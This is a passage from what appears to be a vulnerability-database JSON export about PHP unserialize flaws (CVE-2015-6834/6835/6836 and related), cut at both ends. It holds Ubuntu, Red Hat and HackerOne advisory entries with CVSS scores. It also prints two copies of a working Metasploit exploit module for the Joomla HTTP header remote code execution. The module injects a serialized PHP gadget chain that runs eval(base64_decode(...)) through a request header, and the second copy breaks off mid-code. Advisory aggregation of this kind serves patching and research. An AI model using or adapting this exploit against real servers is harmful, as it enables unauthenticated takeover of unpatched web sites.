function.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=70388>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2015-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-6836", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836"], "modified": "2015-09-09T00:00:00", "id": "UB:CVE-2015-6836", "href": "https://ubuntu.com/security/CVE-2015-6836", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:06:36", "description": "The unserialize implementation in ext/standard/var.c in PHP 7.x before\n7.0.14 allows remote attackers to cause a denial of service\n(use-after-free) or possibly have unspecified other impact via crafted\nserialized data. 
NOTE: this vulnerability exists because of an incomplete\nfix for CVE-2015-6834.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=72978>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-04T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9936", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2016-9936"], "modified": "2017-01-04T00:00:00", "id": "UB:CVE-2016-9936", "href": "https://ubuntu.com/security/CVE-2016-9936", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-19T20:38:51", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-6831, CVE-2015-6832, CVE-2015-6834,\nCVE-2015-6835, CVE-2015-6836)\n\nMultiple flaws were found in the way PHP's Phar extension parsed\nPhar archives. 
A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-5589,\nCVE-2015-5590, CVE-2015-6833, CVE-2015-7803, CVE-2015-7804)\n\nTwo NULL pointer dereference flaws were found in the XSLTProcessor class in\nPHP. An attacker could use these flaws to cause a PHP application to crash\nif it performed Extensible Stylesheet Language (XSL) transformations using\nuntrusted XSLT files and allowed PHP functions to be used as\nXSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nAll rh-php56-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0457) Moderate: rh-php56-php security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5589", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", 
"CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2018-06-12T21:28:17", "id": "RHSA-2016:0457", "href": "https://access.redhat.com/errata/RHSA-2016:0457", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:13", "bounty": 500.0, "description": "https://bugs.php.net/bug.php?id=70219", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-09T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in session deserializer", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6835"], "modified": "2015-09-01T00:00:00", "id": "H1:103998", "href": "https://hackerone.com/reports/103998", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bounty": 1000.0, "description": "https://bugs.php.net/bug.php?id=70172", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-07-31T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in unserialize()", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-01T00:00:00", "id": "H1:103997", "href": "https://hackerone.com/reports/103997", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bounty": 1000.0, "description": "https://bugs.php.net/bug.php?id=70366", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-27T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in unserialize() with SplDoublyLinkedList", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-01T00:00:00", "id": "H1:103995", "href": "https://hackerone.com/reports/103995", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bounty": 1000.0, "description": "https://bugs.php.net/bug.php?id=70365", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-27T00:00:00", "type": "hackerone", "title": "PHP (IBB): Use After Free Vulnerability in unserialize() with SplObjectStorage", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2015-09-01T00:00:00", "id": "H1:103996", "href": "https://hackerone.com/reports/103996", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": 
"2018-08-31T16:41:28", "bounty": 1500.0, "description": "https://bugs.php.net/bug.php?id=70388", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2015-08-29T00:00:00", "type": "hackerone", "title": "PHP (IBB): SOAP serialize_function_call() type confusion / RCE", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836"], "modified": "2015-09-02T00:00:00", "id": "H1:104010", "href": "https://hackerone.com/reports/104010", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2022-06-24T09:36:23", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. 
The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n", "cvss3": {}, "published": "2015-12-15T17:03:36", "type": "metasploit", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-6835"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-MULTI-HTTP-JOOMLA_HTTP_HEADER_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\n 'Description' => %q{\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. 
The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n },\n 'Author'\t=>\n [\n 'Marc-Alexandre Montpas', # discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8562'],\n ['EDB', '38977'], # PoC from Gary\n ['EDB', '39033'], # Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\"\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\n ['URL', 'https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\n 'DisclosureDate' => '2015-12-14',\n 'DefaultTarget' => 0)\n )\n\n register_options(\n [\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\n ])\n\n register_advanced_options(\n [\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\n ])\n end\n\n def check\n res = send_request_cgi({'uri' => target_uri.path })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n unless res.headers['X-Powered-By']\n vprint_error(\"Unable to determine the PHP version.\")\n return Exploit::CheckCode::Unknown\n end\n\n online = joomla_and_online?\n 
unless online\n vprint_error(\"Unable to detect joomla on #{target_uri.path}\")\n return Exploit::CheckCode::Safe\n end\n\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\n version = Rex::Version.new(php_version)\n vulnerable = false\n\n # check for ubuntu and debian specific versions. Was fixed in\n # * 5.5.9+dfsg-1ubuntu4.13\n # * 5.3.10-1ubuntu3.20\n # * 5.4.45-0+deb7u1\n # Changelogs (search for CVE-2015-6835 or #70219):\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\n if rest && rest.include?('ubuntu')\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Rex::Version.new('5.5.9')\n vulnerable = false\n elsif version == Rex::Version.new('5.5.9') && Rex::Version.new(sub_version) >= Rex::Version.new('4.13')\n vulnerable = false\n elsif version == Rex::Version.new('5.3.10') && Rex::Version.new(sub_version) >= Rex::Version.new('3.20')\n vulnerable = false\n else\n vulnerable = true\n end\n elsif rest && rest.include?('+deb')\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Rex::Version.new('5.4.45')\n vulnerable = false\n elsif version == Rex::Version.new('5.4.45') && sub_version != '7u1'\n vulnerable = false\n else\n vulnerable = true\n end\n else\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\n vulnerable = true if version <= Rex::Version.new('5.4.44')\n vulnerable = true if version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.28'))\n vulnerable = true if version.between?(Rex::Version.new('5.6.0'), 
Rex::Version.new('5.6.12'))\n end\n\n unless vulnerable\n vprint_error('This module currently does not work against this PHP version')\n return Exploit::CheckCode::Safe\n end\n\n j_version = joomla_version\n unless j_version.nil?\n vprint_status(\"Detected Joomla version #{j_version}\")\n return Exploit::CheckCode::Appears if Rex::Version.new(j_version) < Rex::Version.new('3.4.6')\n end\n\n return Exploit::CheckCode::Detected if online\n\n Exploit::CheckCode::Safe\n end\n\n def get_payload(header_name)\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}\"\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def exploit\n if check == Exploit::CheckCode::Safe && !datastore['FORCE']\n print_error('Target seems safe, so we will not continue.')\n return\n end\n\n print_status(\"Sending payload ...\")\n header_name = Rex::Text.rand_text_alpha_upper(5)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\n })\n fail_with(Failure::Unknown, 'No response') if res.nil?\n session_cookie = res.get_cookies\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'cookie' => session_cookie,\n 'headers' => {\n header_name => Rex::Text.encode_base64(payload.encoded)\n }\n })\n 
end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/joomla_http_header_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:02", "description": "", "cvss3": {}, "published": "2015-12-17T00:00:00", "type": "packetstorm", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-8562", "CVE-2015-6835"], "modified": "2015-12-17T00:00:00", "id": "PACKETSTORM:134949", "href": "https://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution', \n'Description' => %q{ \nJoomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. \nBy storing user supplied headers in the databases session table it's possible to truncate the input \nby sending an UTF-8 character. The custom created payload is then executed once the session is read \nfrom the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. \nIn later versions the deserialisation of invalid session data stops on the first error and the \nexploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and \n5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1. 
\n}, \n'Author' => \n[ \n'Marc-Alexandre Montpas', # discovery \n'Christian Mehlmauer' # metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-8562'], \n['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'], \n['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'], \n['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'], \n['URL', 'https://bugs.php.net/bug.php?id=70219'] \n], \n'Privileged' => false, \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]], \n'DisclosureDate' => 'Dec 14 2015', \n'DefaultTarget' => 0) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]), \nOptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({'uri' => target_uri.path }) \n \nunless res \nvprint_error(\"Connection timed out\") \nreturn Exploit::CheckCode::Unknown \nend \n \nunless res.headers['X-Powered-By'] \nvprint_error(\"Unable to determine the PHP version.\") \nreturn Exploit::CheckCode::Unknown \nend \n \nphp_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || '' \nversion = Gem::Version.new(php_version) \nvulnerable = false \n \n# check for ubuntu and debian specific versions. 
Was fixed in \n# * 5.5.9+dfsg-1ubuntu4.13 \n# * 5.3.10-1ubuntu3.20 \n# * 5.4.45-0+deb7u1 \n# Changelogs (search for CVE-2015-6835 or #70219): \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog \n# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog \nif rest && rest.include?('ubuntu') \nsub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || '' \nvprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.5.9') \nvulnerable = false \nelsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13') \nvulnerable = false \nelsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20') \nvulnerable = false \nelse \nvulnerable = true \nend \nelsif rest && rest.include?('+deb') \nsub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || '' \nvprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.4.45') \nvulnerable = false \nelsif version == Gem::Version.new('5.4.45') && sub_version != '7u1' \nvulnerable = false \nelse \nvulnerable = true \nend \nelse \nvprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\") \nvulnerable = true if version <= Gem::Version.new('5.4.44') \nvulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28')) \nvulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12')) \nend \n \nunless vulnerable \nvprint_error('This module currently does not work against this PHP version') \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') }) \nif res && res.code == 200 && res.body && 
res.body.include?('<author>Joomla! Project</author>') \njoomla_version = res.body.scan(/<version>([\\d\\.]+)<\\/version>/i).flatten.first || '' \nunless joomla_version.empty? \nvprint_status(\"Detected Joomla version #{joomla_version}\") \nreturn Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6') \nend \nend \n \nres.get_html_meta_elements.each do |element| \nif element.attributes['name'] && \n/^generator$/i === element.attributes['name'] && \nelement.attributes['content'] && \n/joomla/i === element.attributes['content'].value \nreturn Exploit::CheckCode::Detected \nend \nend \n \nExploit::CheckCode::Safe \nend \n \n# gets a random 4 byte UTF-8 character \ndef get_terminator \n# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF \n[rand(0x10000..0x10ffff)].pack('U*') \nend \n \ndef get_payload(header_name) \npre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\" \npre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";' \npay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\" \npost_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}' \nt1000 = get_terminator \nreturn \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{t1000}\" \nend \n \ndef print_status(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef print_error(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef exploit \nif check == Exploit::CheckCode::Safe && datastore['FORCE'] == false \nprint_error('Target seems safe, so we will not continue.') \nreturn \nend \n \nprint_status(\"Sending payload ...\") \nheader_name = Rex::Text.rand_text_alpha_upper(5) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => 
